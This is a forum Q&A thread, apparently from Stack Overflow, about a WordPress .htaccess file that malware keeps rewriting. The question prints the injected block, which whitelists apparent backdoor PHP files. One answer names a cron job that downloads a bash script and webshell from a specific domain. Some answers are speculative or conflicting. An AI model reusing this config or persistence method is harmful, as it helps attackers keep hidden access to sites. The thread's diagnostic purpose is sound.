Reputation: 1
.htaccess file is getting updated with deny code very frequently and resulting in broken dashboard
I am facing issue with my WordPress websites. Frequently .htaccess file is updating with the following deny code
<FilesMatch ".(PhP|php5|suspected|phtml|py|exe|php|asp)$">
Order allow,deny
Deny from all
</FilesMatch>
<FilesMatch "^(postfs.php|votes.php|index.php|wjsindex.php|lock666.php|font-editor.php|ms-functions.php|contents.php|jsdindex.php|wp-login.php|load.php|template-load.php)$">
Order allow,deny
Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>
But default .htaccess code is
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>
If i change to default code also but after some time its again updating with deny code. And this .htaccess file is getting updated in all the folders of the file.
This is happening with all websites which are hosted in same multi-domain hosting plan. This deny code is resulting in broken dashboard and another issues of avoiding modifications etc are raising.
Upvotes: 0
Views: 3446
Answers (4)
Reputation: 83
The code added to the main index page or about php of WordPress was telling PHP-FPM to rebuild the file from it’s cache if it was changed.
- To remove or edit the file, you first need to disable PHP-FPM.
- Change or remove the index.php file.
- Then you can restart PHP-FPM and start doing normal work on the site. Hope this helps someone.
Upvotes: 0
Reputation: 21
i think you have a cronjob that has been downloading the webshells, i have observed this behaviour since the beginning of August.
Are you using c-panel to host your website? If so go check your cronjobs for a task that has a wget request to the domain hello.turnedpro.xyz.There is a bash script that is downloaded and executed to download the webshell from the domain and that's why it keeps on coming back after you delete.
Let me know how it goes.
Upvotes: 1
Reputation: 125
That appears to be the malware adding up .htaccess entry with following coding under root and wp-admin folder. Further, It's also updating index.php file. So, I checked the process using htop. You will find a process keep on running locating php to your website directory as in my case, it was pointing to lock666.php file in root. Turned out file is missing. But somehow the code was in server memory and being executed every time, I updated the .htaccess file above.
Hope, this helps.
Upvotes: 0
Reputation: 61
That is PHP Execution Security Policy. Check the settings in your security plugin.
Upvotes: 1
Related Questions
- .htaccess deny from all
- .htaccess file modifying automatically
- Deny Wordpress and plugins from updating .htaccess file
- Create new .htaccess file to deny
- Changes to .htaccess file keep crashing my Wordpress site
- .htaccess deny from all stops access on website
- .htaccess deny from all BUT server
- .htaccess: Deny from all
- htaccess deny all and cron'd file
- Access despite deny from entry in htaccess